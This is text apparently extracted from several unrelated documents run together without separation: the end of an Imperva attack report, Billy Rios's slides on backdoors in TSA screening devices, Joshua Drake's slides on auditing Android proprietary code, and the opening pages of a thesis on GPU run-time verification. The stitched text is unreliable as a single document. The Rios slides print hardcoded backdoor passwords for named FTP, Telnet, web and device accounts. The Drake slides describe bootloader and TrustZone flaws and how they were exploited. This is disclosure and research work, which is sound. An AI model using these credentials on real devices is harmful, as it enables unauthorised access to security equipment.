Email extraction (also called email scraping) is the practice of scanning web applications and extracting the email addresses and 
other personal contact information that are contained within it. These emails addresses are then used for promotional campaigns 
and similar marketing purposes. Email extraction is one of several activities that harvest data from web applications without the 
consent of data owners and the application administrators.
6.7 Comment Spamming
Comment spamming is a way to manipulate the ranking of the spammer’s web site within search results returned by popular 
search engines. A high ranking increases the number of potential visitors and paying customers of this site. The attack targets web 
applications that allow visitors to submit content that contains hyperlinks. The attacker automatically posts random comments or 
promotions of commercial services to publicly accessible online forums that contain links to the promoted site.
Imperva
Headquarters  
3400 Bridge Parkway, Suite 200  
Redwood Shores, CA 94065  
Tel: +1-650-345-9000  
Fax: +1-650-345-9004
Toll Free (U.S. only): +1-866-926-4678
www.imperva.com
© Copyright 2013, Imperva
All rights reserved.  Imperva and SecureSphere are registered trademarks of Imperva.
All other brand or product names are trademarks or registered trademarks of their respective holders.  #HII-SA-SECURITY-SUMMARY#4-0713rev1Imperva Web Application Attack ReportHacker Intelligence Initiative Overview
Web Application Attack Reports (WAARs) are part of the Imperva Hacker Intelligence Initiative (HII). This initiative goes inside the 
cyber-underground and provides analysis of the trending hacking techniques and interesting attack campaigns from the past 
month. A part of Imperva’s Application Defense Center research arm, the HII, is focused on tracking the latest trends in attacks, Web 
application security and cyber-crime business models with the goal of improving security controls and risk management processes.Pulling the Curtain on Airport Security
Billy Rios
Xssniper@gmail.com
@xssniper
How to get put on the no -fly list...
Why are you doing this?
•Just an average Joe
•Interest in ICS, Embedded and Medical devices
•I travel a lot


Lessons Learned by a Young Butterbar
•Show respect
•Accept Responsibility
•Trust, but Verify
Show me the Money... (budget.house.gov)
•> 50,000 people at more than 400 airports across the country and an annual 
budget of $7.39 billion (2014)
•TSA receives about $2 billion a year in offsetting collections under current law, 
through air -carrier and aviation -passenger security fees. The largest of the fees, in 
terms of total collections, is the Aviation Passenger Security Fee (sometimes 
called the September 11thSecurity Fee), which brings in about $1.7 billion a year.
•By law, the first $250 million of passenger -security fees is set aside for the 
Aviation Security Capital Fund, which provides for airport -facility modifications 
and certain security equipment
Show me the Money...
One guy
no budget
and a laptop
Disclosure
All issues in this presentation were reported to DHS 
via ICS -CERT  >6 months ago
Response?
•Our software “cannot be hacked or fooled”
•“add their own software and protections.”
•<silence>
•Spoke with Morpho last week
Scenarios
(1)TSA doesn’t know about the security issues in 
their software
(2)TSA knew about the security issues, developed 
their own custom fixes, never told the vendors... 
and is hording embedded zero day vulnerabilities 
and leaving other organizations exposed?


A Quick Lesson on Backdoors
I can't believe it, Jim. That girl's standing over there listening 
and you're telling him about our back doors?
[Yelling ] Mr. Potato Head! Mr. Potato head! Backdoors 
are not secrets!
Yeah, but your giving away our best tricks!
They’re not tricks!
A Word About Backdoors
•Malicious account added by a third party
•Debugging accounts that someone forget to remove
•Accounts used by Technicians for Service and 
Maintenance
Technician Accounts == Backdoors
•Often hardcoded into the software
•Applications which depend on the passwords
•Business process which depend on passwords
•External software which depend on passwords
•Training which train technicians to use these passwords
Technician Accounts == Backdoors
•Can be discovered by external third parties (like me!)
•Cannot be changed by the end user (in most cases)
•Once initial work is completed, these passwords usually 
scale


try {
if (Checkpassword ()){
Authenticate();
}
Else{
AuthFail ();
}
}
catch{
ShowErrorMessage ();
Authenticate();
}


“TSA has strict requirements that all vendors must 
meet for security effectiveness and efficiency and 
does not tolerate any violation of contract 
obligations. TSA is responsible for the safety and 
security of the nearly two million travelers 
screened each day.”
http://www.bloomberg.com/news/2013 -12-06/naked -
scanner-maker-osi-systems-falls-on-losing-tsa-
order.html
"Questions remain about how the situation will be 
rectified and the potential for unmitigated threats 
posed by the failure to remove the machinery," the 
committee's Republican and Democratic leaders wrote in a 
Dec. 6 letter to the men. "It is our understanding that 
these new components --inappropriately labeled with the 
same part number as the originally approved component --
were entirely manufactured and assembled in the People's 
Republic of China."
http://www.nextgov.com/defense/2013/12/congress -
grills-tsa-chinese-made-luggage-scanner-
parts/75098/
“The referenced component is the X -ray generator, 
a simple electrical item with no moving parts or 
software.”
He described the piece as "effectively, an X -ray 
light bulb."
http://www.nextgov.com/defense/2013/12/congress -
grills-tsa-chinese-made-luggage-scanner-
parts/75098/


Interesting Items
•VxWorks on PowerPC
•VxWorks FTP
•VxWorks Telnet
•Web server
•Server: Allegro -Software -RomPager /4.32
•WWW -Authenticate: Basic realm="Browser"


Backdoors...
•FTP and Telnet -SuperUser:2323098716
•config \devCfg.xml file 
•MaintValidation.class file within the m8m.jar
•Web -KronosBrowser:KronosBrowser
•~6000 on the Internet, two major airports
Here’s a thought...
•Foreign made main board on TSA Net that can track which TSA 
personnel are on the floor at any given moment
•Hardcoded FTP password/backdoor
•Hardcoded Telnet password/backdoor which gives up a 
VxWorks shell
•Hardcoded Web password/backdoor
Does TSA know Kronos4500’s have Chinese 
made main boards? 
Does the TSA know the software has 
hardcoded backdoors?
Trust but Verify the Engineering


Itemiser
•X86 (Pentium Processor)
•Windows CE
•Disk on chip with ~7.5 meg main program
•PS2, Floppy, USB
•IrDA?!?!?!?!
File System
•ITMSCE.exe (Main Application)
•Users.bin (User Accounts)
•Config.bin (Settings for detection)
•Options.bin
•History.bin
•Alarms (folder)


Users on the user menu Itemiser
•Operator 1
•Maintenance 1
•Administrator 1
•Super User 1
•<various user accounts>

Users in the Binary
•Operator 1
•Maintenance 1
•Administrator 1
•Super User 1 
•Administrator 2
•Super User 2
Users in the Binary vsUser Menu
Binary
•Operator 1
•Maintenance 1
•Administrator 1
•Super User 1 
•Administrator 2
•Super User 2User Menu
•Operator 1
•Maintenance 1
•Administrator 1
•Super User 1 
Two Backdoor Accounts
•Administrator 2: 838635
•SuperUser 2: 695372


Blame the vendor?
This is actually, TSA’s Fault
•TSA depends on this equipment to do their job
•TSA operators do not have the expertise to detect exploited 
devices
•TSA has not conducted adequate threat models on how these 
devices are designed from a cyber security standpoint
•TSA has not audited these devices for even the most basic security 
issues
•Vendors develop devices to meet TSA requirements
•TSA certifies devices it deems satisfactory
•We pay for all this...
I hope that someone (maybe the GAO?) trusts
what the TSA is telling us about their 
devices, but verifies the engineering is a 
reality
If you have embedded devices, I would hope 
you would do the same for your devices
BEFORE you fork over the $$!
Questions?© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 © 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  Reversing and Auditing  
 Android’s Proprietary Bits  
 
Joshua J. Drake  
REcon  2013  
June 23rd 2013  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
Agenda  
Introduction  
Background  
Proprietary Code  
Reversing  
Auditing  
Case Studies  
Conclusion / Q & A  

© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Joshua J. Drake, aka jduck  
•Director of Research and Development  
•Previously Senior Research Consultant  
•Former Lead Exploit Developer at  
 
•Research background:  
•Linux – 1994 to present  
•Android – 2009 to present  
 
•Demonstrated Android 4.0.1 browser exploit with 
Georg Wicherski  at BlackHat  USA 2012  
•Lead author of “Android Hacker’s Handbook ” Introduction  

© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  BACKGROUND  
Why look at Android’s proprietary bits?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
•Android !!  
•Most common operating system (period)  
•Complex ecosystem  
•Primarily ARM devices  
•Linux based  
•“Open source”  
•Developed in Java/C/C++  Background – Android  
Did he really just try the  
Jedi Mind Trick on me?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
Background – Ecosystem  
Google  
Consumers  Everything  Lower -level Everything  
Apps  
boot loader  
and radio  
requirements  SoC Manufacturers  
OEMs  
Carriers  
Diagram by Pau Oliva  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Almost entirely ARM devices out there  Background - Devices  
Image provided by Snowflake Bentley – http://snowflakebentley.com/  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 Background – My devices  

© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Android Open Source Project (AOSP)  
 
 
•"Outside of proprietary device -specific files that 
come from hardware manufacturers, the basic rule is 
that everything is Open Source except the apps that 
talk to Google services: we want to be sure that the 
Android platform itself remains free of Google -
specific code .” 
 
•Sums it up superbly!  Background – “Open source”  
via Jean -Baptiste Quéru  (AOSP maintainer, actually pushes the code)  
https ://plus.google.com/112218872649456413744/posts/g8YnZh5begQ  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Building your own firmware from AOSP requires 
binary blobs  
 
•Nexus 4 factory images taken down shortly 
after they were first posted  
•Licensing issue maybe?  
 
•Sometimes source code doesn’t match the bins  
•Example: Nexus 4 kernel config  
•live device has CONFIG_MODULES=n  
•Kernel source has CONFIG_MODULES=y  Background – “Open source”  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  PROPRIETARY CODE  
No source code, no docs, no bugs, right?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Closed -source binary code is littered everywhere!  
•Third party licensed code  
•Nth party software  
 
•You can find proprietary software...  
•In the kernel, modules  
•In user -space  
•In lower -level areas  
•Even apps  
•Really anywhere...  Proprietary Code – What kinds?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Tons of stuff deep under the hood  
•Boot loaders  
•TrustZone OS / TZ apps  
•Baseband  
 
•Kernel space drivers  
•Developed by OEMs or licensed from 3rd parties  
•File system drivers, WiFi, Bluetooth, etc 
 
•User -space  
•rild / vendor -ril 
•TrustZone storage (no persistent storage in TZ)  Proprietary Code – What kinds?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Device tree concept  
•Commonly heard in rom development communities  
•“device” directory in AOSP  
•Binary blobs required for a particular device  
 
•Nexus devices  
•Nexus binary -only drivers page  
 
•OEM devices  
•Only from “stock roms ”, updates, live devices  Proprietary Code  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Getting proprietary binaries is usually easy  
 
•From “ roms ” or updates  
•Often requires special extraction methods  
•Google for “<device> stock rom”  
•Unpacking tools vary : -/ 
 
•From a live device  
•Dumping partitions  
•/vendor, /firmware, / sbin, other directories  
•Works even when no OTA or factory images are 
available!  Proprietary Code – Getting Bins  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Enumerating process list  
•Comparing it against a Nexus device  
•Exclude core services  Proprietary Code – Finding more  
root@android :/ # getprop  ro.build.version.release  
4.2.2  
root@android :/ # ps | grep -v ' 2 ' | wc -l 
56 
 
root@cdma_maserati :/data # getprop  ro.build.version.release  
4.1.2  
root@cdma_maserati :/data # ps | grep -v ' 2 ' | wc -l 
79 
 
ps | grep  -v ' 2 ' | grep  -Ev 
'/(vold|rild|debuggerd|drmserver|mediaserver|surfaceflinger|installd|netd|
keystore|ueventd|init|servicemanager|adbd)'  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Enumerating the file system  
•Again, diff against a Nexus device  
•Various directories to look in...  
•/vendor, /system/vendor  
•/firmware  
•/system/lib includes some too  
•Inside apps’ data directories  
 
•As easy as a few shell commands  Proprietary Code – Finding more  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Enumerating the file system  Proprietary Code – Finding more  
dq:0:~/android/cluster $ ./oneliner.rb  getprop  ro.build.fingerprint  | grep JRO 
[*]   nexus -s: google /sojus /crespo4g: 4.1.1/JRO03R /438695:user/release -keys 
[*]      sgs3: samsung /d2spr/d2spr: 4.1.1/JRO03L /L710VPBLJ7:user/release -
keys 
dq:0:~/android/cluster $ ./cmd.rb  <DEVICE> su –c /data/local/ tmp/busybox  find 
/ -print > /data/local/ tmp/find.log  
dq:0:~/ android/cluster $ ls -l *.log  
-rw-------  1 jdrake  jdrake  4.2M Jun 23 12:18 nexus -s_find.log  
-rw-------  1 jdrake  jdrake  9.3M Jun 23 12:20 sgs3_find.log  
dq:0:~/android/cluster$  grep ^/system/lib/ nexus -s_find.log | sort > 1  
dq:0:~/android/cluster$  grep ^/system/lib/ sgs3_find.log | sort > 2 
dq:0:~/android/cluster$  wc –l 1 2 
    206 1 
    539 2 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
Proprietary Code – Finding more  
dq:0:~/android/cluster $ diff –ub 1 2 
--- 1   Sun Jun 23 12:29:01 2013  
+++ 2   Sun Jun 23 12:28:50 2013  
@@ -4,49 +4,133 @@  
 /system/lib/bluez -plugin/input.so  
 /system/lib/bluez -plugin/network.so  
 /system/lib/ drm 
+/system/lib/drm/libdivxplugin.so  
+/system/lib/drm/libdrmwvmplugin.so  
 /system/lib/drm/libfwdlockengine.so  
+/system/lib/drm/libomaplugin.so  
+/system/lib/drm/libplayreadyplugin.so  
+/system/lib/drm/libtzprplugin.so  
 /system/lib/ egl 
 /system/lib/ egl/egl.cfg  
+/system/lib/egl/eglsubAndroid.so  
...and more...  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Make sure you look for the source first!  
 
•Even though something looks closed, it may be 
based on open -source code  
 
•Check and double -check  
•Source will save you time  
•If you still use the bins, the source can help lots  Proprietary Code – Final note  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  REVERSING  
Source code is overrated.  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Two approaches to reverse engineering  
 
•Static analysis  
 
•Dynamic analysis  
 
•There’s real power in combining the two!  
•ie. resolving indirect code or data flow  Reversing  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Reversing ARM binaries can be tricky  
•Thumb vs ARM – troublesome and manual  
 
•Looking at ARMv7 bins with IDA Pro  
1.Open the binary  
2.Select ARM from processor type drop -down (tab, home)  
3.Click button “Set” button (tab, space)  
4.Click “Processor options” (alt -p) 
5.Click “Edit ARM architecture options” (tab, space)  
6.Click “ARM v7 A&R”  
7.Click “OK”, “OK”, “OK”  
8.Dig in!  Reversing – Static Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•String analysis  
•Your best friend ! Reversing – Static Analysis  

© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•De-compilation - Hex-rays helps!  
•Faster to read C -style pseudo code  
•Structure recovery  
•Type propagation  
•Great for C++  
•Some issues with Linux -kernel ASM functions  
 
•Using symbols  
•Linux imports / exports are by name only  
•Common to find decent symbols  Reversing – Static Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Differential analysis  
 
•Comparing binaries  
•Comparing file system entries  
•Comparing running processes  
•Comparing specific files  
 
•Mostly for re -discovering known bugs  
•Useful for watching evolution of some code  Reversing – Static Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Grooming your IDB helps tremendously  
 
•Look for:  
•Functions with tons of cross -references  
•Large functions  
 
•If the bin has no imports (compiled static)  
•Try to identify common library functions first  
•memcpy , strcpy , strlen , strncpy , strlcpy , etc etc etc Reversing – Static Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•User -space debugging options  
 
•logcat  
•Light on information, but still useful  
•Useful to see known strings  
 
•GDB  
•Apparently not the most stable tool  
•Python support in latest AOSP  
•Remote debugging is slow  
•Lack of symbols causes major problems  Reversing – Dynamic Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Symbols are more important on ARM  
 
 
•$a – ARM code  
•$t – Thumb code  
•$d – Data  
 
•GDB _relies_ on these  
•No symbols means manual ARM vs Thumb  
•Add 1 for Thumb when using x/ i, setting breakpoints, etc 
•Use the thumb bit in $ cpsr! Reversing – Dynamic Analysis  
$ readelf  –a binary | grep ‘ \$’ 
 31: 00008600     0 NOTYPE  LOCAL  DEFAULT    8 $a 
 32: 000087b4     0 NOTYPE  LOCAL  DEFAULT    8 $d 
  ... 
 37: 00008800     0 NOTYPE  LOCAL  DEFAULT    8 $t 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Instrumentation / Hooking  
•Much more efficient  
 
•Challenges  
•ARM vs Thumb (again)  
•Cache issues  
•No standard prologues  
•pc-relative data  
 
•Although tedious, can be achieved, see:  
•Collin Mulliner’s  android_dbi  
•saurik’s  Mobile Substrate  Reversing – Dynamic Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Kernel / boot loader debugging  
•JTAG (probably disabled)  
 
•USB-UART cables (Samsung and Nexus 4) 
•kgdb  possible with a custom kernel  
 
•Kernel debugging  
•proc file system ( kmsg , last_kmsg ) 
 
•Changing the kernel command line 
•Requires a custom boot.img  Reversing – Dynamic Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Instrumentation / Hooking  
•Again, much more efficient  
 
•kprobes , jprobes  
•Requires a custom kernel  
 
•Custom hooking  
•Needs only root  
•Same challenges as user -space  Reversing – Dynamic Analysis  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  AUDITING  
But didn’t we fix all the bugs already?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Several methodologies  
•Top-down  
•Follows data flow / tainted input  
 
•API-based  
•Unsafe use of buffer functions  
•Format string vulnerabilities  
•Unsafe command execution usage  
•Checking memory allocations  
•Checking static buffer usage  
 
•Grep -for-bugs  
•Sign extension bugs  
•Integer overflows in allocations, etc Auditing  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Force Multipliers  
1.Learn as much as you can  
2.Deep understanding of the OS, APIs, architecture 
helps  
3.Taking advantage of source , docs, etc 
 
•NO ASSUMPTIONS.  
 
•Take lots of notes!  
•Make comments and marks in IDA  Auditing Tips  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Auditing binaries makes some bugs obvious  
•Pros 
•CPP macros are eliminated  
•Compiler may do something horribly wrong  
•No comments means no misleading statements  
•Likely to be less audited  
 
•Cons  
•More work to see the higher level  
•Binary auditing requires assembly skills  
•Unfortunately slower going  
•Dealing with indirection statically is a pain  Auditing – Binaries vs. Source  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
•Low-level software attack surfaces  
•Boot loaders  
•partition table/data  Attack Surfaces – Low-level 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Issue in the SGS4 boot loader  
•Discovered / released by Dan Rosenberg  
•For Qualcomm based devices (AT&T, VZW)  
•Allows bypassing secure boot chain  
•Can boot a custom kernel / ramdisk  
 
•Samsung’s “ aboot ”, final stage boot loader  
•Verifies a signature on the “ boot.img ” 
•Based on the open source LK boot loader  
•Had a few modifications  Case Study - Loki 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Using the base source and binary from the 
device together helps get and stay oriented  
•The code:  Case Study - Loki 
hdr = (struct  boot_img_hdr  *)buf; 
 
  image_addr  = target_get_scratch_address (); 
  kernel_actual  = ROUND_TO_PAGE( hdr->kernel_size , page_mask ); 
... 
  /* Load kernel */  
  if (mmc_read (ptn + offset, (void *) hdr->kernel_addr , kernel_actual )) { 
    dprintf (CRITICAL, "ERROR: Cannot read kernel image \n"); 
    return -1; 
  } 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•OOPS!  
 
•They trusted data in the boot.img  header when 
reading from flash!  
 
•Dan overwrote the aboot  code itself  
•Replaced the signature checking function with his 
own 
•Simply fixed up the mess and returned success  Case Study - Loki 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
•Low-level software attack surfaces  
•TrustZone  
•From ring0 only  
 Attack Surfaces – Low-level 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Motorola TrustZone OS vulnerability  
•Discovered / released by Dan Rosenberg  
•Allows unlocking the boot loader  
•Could potentially allow more...  
 
•Boot loader uses QFUSES  
•Can only be set one time!  
•Used by the OEM -supported unlock mechanism  
 Case Study - Motopocalypse  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•TrustZone uses SMC instruction  
•Secure Monitor Call  
•Similar to how user -space calls kernel -space  
•Requires ring0 code execution  
•Processed inside TrustZone  
 
•Dan found a bug in some TrustZone code  Case Study - Motopocalypse  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Inside Motorola’s SMC handling code:  Case Study - Motopocalypse  
switch (code ) { 
        ... 
        case 9:  
            if ( arg1 == 0x10 ) {  
 
                for (i = 0; i < 4; i++) 
                    *(unsigned long *)( arg2 + 4*i) = global_array [i]; 
                ret = 0;  
            } else  
                ret = -2020;  
            break;  
        ... 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•OOPS!  
•Attacker -controlled memory write!  
 
•Dan overwrote an important flag  
•Enabled boot -loader -only SMC operations  
•Called OEM -supported unlock code  
 
•Voila!  
•Unlocked boot loader via buggy proprietary code.  Case Study - Motopocalypse  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
•Low-level software attack surfaces  
•Baseband  
•RF based attacks  
•From application processor  Attack Surfaces – Low-level 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•What is S -OFF?  
•“Security Off”  
•Relates to locked flash memory in HTC devices  
•Prevents writing to /system  
•Even with root  
•Event after remounting  
 
•Some tools turn this off using baseband 
exploits!  
•They start with root, attack the baseband from the 
application processor  Case Study – S-OFF 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Hardware attacks  
•USB – UART cables  
•Via headphone jack on Nexus 4  
•Using special OTG cable on Samsung devices  
 
•JTAG  
•Usually disabled  
 
•Other bus -based attacks  
•SPI 
•I2C 
•etc Attack Surfaces – Low-level 
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Custom / third party kernel modules  
 
•Attack surfaces  
•Traditional Linux attack surfaces  
•proc, sys, debug, etc file systems  
•ioctl on open file descriptors  
•Custom implementations of POSIX apis 
•ie. custom mmap  handler  
 
•Depends largely on the type of driver  Attack Surfaces – Kernel  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
•Attack surfaces  
•Insecure file system permissions  
•Unsafe shell operations during boot 
•Socket endpoints (TCP, UDP, NETLINK, UNIX, 
abstract domain)  
•BroadcastReceivers , ContentProviders , etc 
•Enumerate via proc file system  Attack Surfaces – User -space  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  UNDISCLOSED CASE STUDY  
Oh, look! Bugs! Who knew?  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
 
DEMO  Undisclosed Case Study  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  CONCLUSIONS  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Fragmentation rampant  
•Complicates attacks  
•Helps defense a bit  
 
•The ARM architecture is a PITA  
 
•Proprietary bits of Android are great to audit  
•Requires more skills, less people have done it  
 
•Buggy code, surely still more bugs lurking  
 
•Donate unwanted Android devices to us!  Conclusions  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  PLEASE ASK QUESTIONS!  
About Android, code, bugs, the book,  
anything...  
Joshua J. Drake  
Twitter: @ jduck  / IRC: jduck  
jdrake  [circled -a] accuvant.com  
www.accuvant.com  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
Joshua J. Drake  
Twitter: @ jduck  / IRC: jduck  
jdrake  [circled -a] accuvant.com  
www.accuvant.com  
 

© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  BONUS SLIDES  
These didn’t make the cut.  
© 2013 Joshua J. Drake of Accuvant, Inc. All Rights Reserved.  
•Android Open Source Project (AOSP)  
•Kind of a misnomer : -/ 
 
•Google pushes their source after releases  
•Not true open source  
•Sets a bad example  
 
•Downstream (OEMs, etc) modify AOSP  
 
•How many of you have checked out a copy?  Background – “Open source”  Parallel Run-Time Verification
by
Shay Berkovich
A thesis
presented to the University of Waterloo
in fulfillment of the
thesis requirement for the degree of
Master of Applied Science
in
Electrical and Computer Engineering
Waterloo, Ontario, Canada, 2012
c⃝Shay Berkovich 2012
I hereby declare that I am the sole author of this thesis. This is a true copy of the thesis,
including any required final revisions, as accepted by my examiners.
I understand that my thesis may be made electronically available to the public.
ii
Abstract
Run-time verification is a technique to reason about a program correctness. Given a
set of desirable properties and a program trace from the inspected program as an input,
the monitor module verifies that properties hold on this trace. As this process is taking
place at a run time, one of the major drawbacks of run-time verification is the execution
overhead caused by a monitoring activity. In this thesis, we intend to minimize this over-
head by presenting a collection of parallel verification algorithms. The algorithms verify
properties correctness in a parallel fashion, decreasing the verification time by dispersion
of computationally intensive calculations over multiple cores (first level of parallelism). We
designed the algorithms with the intention to exploit a data-level parallelism, thus specif-
ically suitable to run on Graphics Processing Units (GPUs), although can be utilized on
multi-core platforms as well. Running the inspected program and the monitor module on
separate platforms (second level of parallelism) results in several advantages: minimiza-
tion of interference between the monitor and the program, faster processing for non-trivial
computations, and even significant reduction in power consumption (when the monitor is
running on GPU).
This work also aims to provide a solution to automated run-time verification of C
programs by implementing the aforementioned set of algorithms in the monitoring tool
called GPU-based online and offline Monitoring Framework (GooMF). The ultimate goal
of GooMF is to supply developers with an easy-to-use and flexible verification API that
requires minimal knowledge of formal languages and techniques.
iii
Acknowledgements
I would like to thank University of Waterloo for giving me the chance.
iv
Dedication
This is dedicated to Kate and Alyssa, two precious flowers, whom I am lucky to call
my family.
This is also dedicated to my personal heroes Paolo Borsellino and Giovanni Falcone,
who made the world a better place to live by sacrifising their own lives.
v
Table of Contents
List of Figures ix
1 Introduction 1
1.1 Run-Time Verification and Execution Overhead Problem . . . . . . . . . . 1
1.2 Shortage in RV Frameworks for C and C++ . . . . . . . . . . . . . . . . . 4
1.3 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4 Thesis Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2 Background 7
2.1 Linear Temporal Logic (LTL) . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2 3-Valued LTL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
2.3 Graphics Processing Unit (GPU) Architecture . . . . . . . . . . . . . . . . 12
2.4 OpenCL Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
3 Algorithms Hierarchy 18
3.1 Sequential Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
3.2 Parallel Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.2.1 History of LTL Property . . . . . . . . . . . . . . . . . . . . . . . . 20
3.2.2 Partial–Offload Algorithm . . . . . . . . . . . . . . . . . . . . . . . 23
3.2.3 Finite-history Algorithm . . . . . . . . . . . . . . . . . . . . . . . . 24
3.2.4 Infinite-history Algorithm . . . . . . . . . . . . . . . . . . . . . . . 27
vi
3.3 Evaluation of Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
3.3.1 Experiment Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
3.3.2 Throughput Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.3.3 UAV Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
4 GooMF Framework 39
4.1 Run-Time Verification Tools Overview . . . . . . . . . . . . . . . . . . . . 39
4.2 GooMF Architecture and Implementation . . . . . . . . . . . . . . . . . . 41
4.2.1 Online Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.2.2 Offline Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.2.3 Synchronous vs. Asynchronous Invocation . . . . . . . . . . . . . . 44
4.2.4 Other Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
4.2.5 Implementation Issues . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.3GooMF and RiTHM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
4.3.1 RiTHM Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
4.3.2 GooMF as a Back End for RiTHM . . . . . . . . . . . . . . . . . . 51
5 Towards Parameterized Monitoring 53
5.1 Introduction to Parameterized Monitoring . . . . . . . . . . . . . . . . . . 53
5.2 State of the Art in Parameterized Monitoring . . . . . . . . . . . . . . . . 58
5.3 Parallel Verification amid Parameterized Monitoring . . . . . . . . . . . . . 60
5.3.1 Algorithms and Parameterized Monitoring . . . . . . . . . . . . . . 60
5.3.2 GooMF and Parameterized Monitoring . . . . . . . . . . . . . . . 63
5.3.3 Future Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
5.4 Evaluation of Algorithms amid Parameterized Monitoring . . . . . . . . . . 65
5.4.1 Experiment Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
5.4.2 Execution Time Analysis . . . . . . . . . . . . . . . . . . . . . . . . 68
6 Related Work 70
vii
7 Conclusions and Future Work 73
7.1 Fitness for Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
7.2 Further Research Directions . . . . . . . . . . . . . . . . . . . . . . . . . . 75
APPENDICES 77
AGooMF Online API Header 78
BGooMF Offline API Header 84
C Configuration File Example 87
References 97
viii
List of Figures
1.1 Run-time verification flow . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2.1 The monitor for property φ≡(¬spawn Uinit) . . . . . . . . . . . . . . . 11
2.2 GPU architecture on the example of Nvidia GeForce GTX 480 . . . . . . . 13
2.3 GPU memory hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.4 Example of a program in C and in OpenCL kernel. . . . . . . . . . . . . . 17
